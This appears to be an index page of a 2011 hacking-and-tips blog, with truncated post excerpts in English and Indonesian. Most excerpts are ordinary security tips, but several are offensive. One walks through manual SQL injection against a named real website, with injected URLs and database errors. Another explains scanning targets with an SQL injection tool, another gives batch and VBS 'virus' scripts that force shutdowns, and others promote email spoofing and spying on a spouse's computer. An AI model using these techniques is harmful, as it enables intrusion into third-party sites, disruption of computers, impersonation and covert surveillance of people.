This is default featured post 1 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

music

visitors

free counters

Rabu, 20 Juli 2011

Know More About Secure Sockets Layer (SSL)

Secure Sockets Layer (SSL) is the most widely used technology for providing a secure communication between the web client and the web server. Most of us are familiar with many sites such as Gmail, Yahoo etc. using https protocol in their login pages. When we see this, we may wonder what’s the difference between http and https. In simple words HTTP protocol is used for standard communication between the Web server and the client. HTTPS is used for a SECURE communication. What exactly is Secure Communication ? Suppose there exists two communication parties A (client) and B (server). Working of HTTPWhen...

4 Ways to Identify Safe Websites on the Internet

On the whole Internet, there are approximately more than 150 million active websites up and running. As a result, it often becomes a real challenge for the users to identify safe websites that are trustworthy and reputed. Have you ever wondered to know the reputation of a website before placing the order? Need to know whether a given website is child safe? Well, here are some of the ways to identify safe websites on the Web.  1. WOT or Web Of Trust (www.mywot.com): WOT is a great place to test the reputation of your favorite website. WOT gives real-time ratings for every website based on the feedback that it gets...

Minggu, 17 Juli 2011

How to Disable Windows Logo Key

At times it becomes necessary to disable the Windows Key on the keyboard. For example when playing games this nasty Windows Logo key keeps annoying, as we often accidently press it and this takes our game out to the desktop. So it becomes necessary to disable it when not needed an re-enable it when needed.The following download consists of two registry scripts (.reg) one to disable windows key and the other to re-enable it. In this download there are two filesdisable_winlogo_key.reg - Disable Windows Logo Ley re-enable_winlogo_key.reg - Re-Enable Windows Logo KeyHere is the Download L...

How to Hide Your IP Address

Every time your computer is connected to the Internet, it is assigned a public IP address which is used to uniquely identify your computer. Wherever you visit websites or use Internet services, your public IP is also transmetted and recorded in the logs kept on those servers. Thus, your IP address makes it possible to trace all your web activities back to you. So, How do I Hide my IP Address? The best and the easiest way to hide your IP address is by using a proxy server (anonymous proxy server) in one form or the other. A proxy server is a special type of server which acts as an intermediary between your...

How to Enable Telnet Command in Vista

Most of you are familiar with the telnet command. It is one of the well known Windows IP Utilities. In fact the telnet command is most important for sending a fake email which i have discussed in my previous post. If you are using Windows XP the telnet command is available by default.But if you use Windows Vista the telnet command is disabled by default.So when you try to use the telnet command in Windows Vista you get the following error message.‘telnet’ is not recognized as an internal or external command,operable program or batch file.You get this error in Vista because unlike XP, Vista does not support telnet command by default. So,...

How to Send Anonymous Emails

How To Send Anonymous EmailsMost of us are very curious to know a method to send anonymous emails to our friends for fun. But the question is, is it possible to send anonymous emails in spite of the advanced spam filtering technology adopted by email service provides like Gmail, Yahoo etc? The answer is YES, it is still possible to bypass their spam filters and send anonymous emails to your friends. For example, you can send an email to your friend with the following sender details. From: Bill Gates <billg@microsoft.com>The art of sending this kind emails is known as Email Spoofing. In my previous post on How to Send...

Free Tools for Spyware Removal

There are lot of PC users who know only little about “Spyware”, “Malware”, “hijackers”, “Dialers” & many more. This article will help you avoid pop-ups, spammers and all those baddies.What is Spyware?Spyware is computer software that is installed surreptitiously on a personal computer to intercept or take partial control over the user’s interaction with the computer, without the user’s informed consent. The term spyware suggests software that secretly monitors the user’s behavior. Spyware programs can collect various types of personal information, such as Internet surfing habit, sites that have been visited etc.How to check if...

How to Change the ICON of an EXE file

Some times it becomes necessary to change the ICON of an executable (.exe) file so that the exe file get’s a new appearence. Many of the Tools such as TuneUP Winstyler does this job by adjusting the Windows to display a custom icon to the user. But in reality when the file is carried to a different computer, then it shows it’s original ICON itself. This means that inorder to permanantly change the ICON, it is necessary to modify the executable file and embed the ICON inside the file itself. Now when this is done the exe file’s ICON is changed permanantly so that even if you take file to a different computer it show’s a new icon.For...

How to Download Videos from Youtube

Here is the most easiest way to download videos from Youtube and convert it into other formats.Most of the sites give you some confusing way to download videos from Youtube, but here is an easy way. Here is step-by-step guide to download videos from Youtube.STEP-1. DOWNLOADING THE VIDEO FROM YOUTUBEBasically the video that you want to download from Youtube will be in the .flv format. So first, when you download videos from Youtube, it will be saved in .flv format. Once you get the video URL,  you can use any one of the following sites/plugins to download Youtube...

How to Protect an Email Account from being Hacked

Today in this post I’ll teach you how to protect your email account from being hacked. Nowadays I get a lot of emails where most of the people say “My Email account is hacked please help…”. Now one question which arises in our mind is: “Is it so easy to hack an email account? OR Is it so difficult to protect an email account from being hacked?”. The single answer to these two questions is “Absolutely NOT!”. It is neither easy to hack an email nor difficult to protect an email account from bieng hacked.If this is the case, then what is the reason for many people to lose their accounts? The answer is very simple. They don’t...

How to Monitor a Remote Computer

Most of the time, it becomes necessary for us to monitor our own computer or a remote computer to keep track of the activities going on. This may be for several reasons. Especially it is most necessary for the parents to monitor their computer to keep track of their children’s activities during their absence. Some people may also require to monitor their computer to keep an eye on the activities of their spouse or partner.Today, with the advancement in the field of software technology, it is possible to easily monitor any given computer. For this all you have to do is, use a PC Monitoring Software. But the job doesn’t...

How to Protect an Email Account from SPAM

Most of us get SPAM every day. Some of us get more and some little. Even a newly created email account will begin to receive spam just after a few days of it’s creation. Many times we wonder where these spam come from and why? But this question remains unanswered within ourselves. So in this post I will try my best to give every possible information about the spam and will also tell you about how to combat spam.What is SPAM?Spam is the abuse of electronic messaging systems (including most broadcast media, digital delivery systems) to send unsolicited bulk messages indiscriminately. Most widely recognized form of...

12 Tips to Maintain a Virus Free Computer

Is your computer infected with virus? Do you often get mysterious error messages? Well this is a common problem faced by almost all the computer users across the globe. There are many viruses and worms out there that could infect your computer. Some are harmless, but, they do have the capacity to do any number of nasty things, up to and including, erasing all data from your computer. However there are ways to keep viruses away from your PC. Here are the 12 tips to maintain a virus free computer.1. Email is one of the common ways by which your computer can catch a virus. So it is always recommended to stay away from SPAM. Open only...

A Virus Program to Disable USB Ports

In this post I will show how to create a simple virus that disables/blocks the USB ports on the computer (PC). As usual I use my favorite C programming language to create this virus. Anyone with a basic knowledge of C language should be able to understand the working of this virus program.Once this virus is executed it will immediately disable all the USB ports on the computer. As a result the you’ll will not be able to use your pen drive or any other USB peripheral on the computer. The source code for this virus is available for download. You can test this virus on your own computer without any ...

Which is the Best Computer Spy Software

Find out the Best Computer Spy Software If you are in search of the best Computer Spy Software on the Internet, then you’ve landed at the right place. In this post I will try to give my honest review of some of the top spy softwares on the market. Here you will find every possible information that you need to know before you make a choice of the right Spy software. So, I highly recommend that you read this post completely before you make your next move.Since I have already discussed how to use these spy tools in my previous post How to Monitor Local or Remote PC, in this post I’ll only give the information...

Scaner Web 4 Fun

kali ini sya akan share tentang Tools dalam dunia hacking Website,,,cieee,,,illeeeee,,,, Sobat semua, ini adalah tools untuk scan website apakah vuln ato tidak ?? soo,,,,,langung aja ane kasih tutor bwt semua tanpa pake lama dechhh,,,,,,, masukkin url target.. misalnya http://www.target.com di sql injector trus liat debugging window biar tau si program kerjanya ngapain (menu settings -> show debug window, ato pencet ctrl+w) bis itu pencet si tombol go tunggu.... tunggu... tunggu... sampe ntar nongol url yg ada tanda seru dibelakangnya -> [!] misal code : http://www.target.com/ind/Read/?type=ixReg&id=590&thn=2010&name=PMK_Nomor_239_PMK_011_2009.htm [!] nah brarti itu 90% vuln kamu boleh stop sekarang ato biarin si program nyari sqli bugs yg lain klo udah stop. skarang...

Manual SQL Injection

    Target : http://www.natoleo.com/Content.php?id=141. Cek bug pada suatu website dengan menambahkan single quote ( ' ) dibelakang url, ternyata terdapat bug pada http://www.natoleo.comhttp://www.natoleo.com/Content.php?id=14’ muncul pesan error: MySQL Error: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' order by a.content_order Asc' at line 1) 2. Untuk mencari column gunakan perintah [order by].order by 1--dimulai dengan angka 1, selanjutnya 2, dst sampe muncul pesan errorpada target kita kali ini, error muncul pada angka 6. MySQL Error: 1054 (Unknown column '6' in 'order clause')http://www.natoleo.com/Content.php?id=14 order by 5--jadi angka yang...

windows Scripting

Membuat Virus yang bisa membuat Kompi Restart Masuk Notepad kemudian isi script di bawah ini : @echo off shutdown -r -f -t 00 Perintah ini hanya akan me-restart komputer Anda. Anda aman untuk mencobanya. Sama seperti script virus.bat, script di atas ini juga harus disimpan dengan ekstensi .bat, misalnya restart.bat Membuat Virus yang bisa Restart / shutdown Kompi dalam Hitungan Detik Masuk Notepad kemudian tulis script di bawah ini : CreateObject(”WScript.Shell”).run “shutdown -s-f -t 60, vbhide Simpan script tersebut dalam bentuk file.vbs, misal : virusshutdown.vbs. Virus ini berfungsi untuk mematikan windows dalam waktu 60 sekon “shutdown -s-f -t 60" s = untuk shutdown dan r = untuk reboot\restart Membuat Virus yang bisa menghapus Folder dalam Kompi Masuk Notepad...

How to Recover Deleted Files from Windows and Mac

How to Recover Deleted Files Have you accidentally deleted your files from the Hard disk? Do you desperately want to recover them back? Well, you need not panic!It is possible to recover the deleted files back from the hard disk  (even after you have Shift+Deleted)  provided you act as soon as you realize that the files are deleted and use the best deleted files recovery software.In this post you will find a detailed information on how to recover the deleted files from your Windows PC or Mac. How Does the File Recovery Process Works? When you delete a file from your computer, (or even from the recycle...

Sabtu, 16 Juli 2011

How to Repair Registry of Windows PC

Registry Repair Tips  This article explains how to inspect and repair registry errors in your Windows PC, so as to improve it’s overall performance. If you are a Windows user, then you will most probably be aware of the fact that the Windows registry gets corrupted over time resulting in an overall decreased performance of your computer.At times, registry errors can also make your PC to freeze down and hang up every now and then causing a serious annoyance to the user. At this point, the registry needs a serious repair to bring your PC back to it’s life. Well, before I tell you how to...

Pages 231234 »

Share

Twitter Delicious Facebook Digg Stumbleupon Favorites More

 
n
o
i
s
i
V
y
M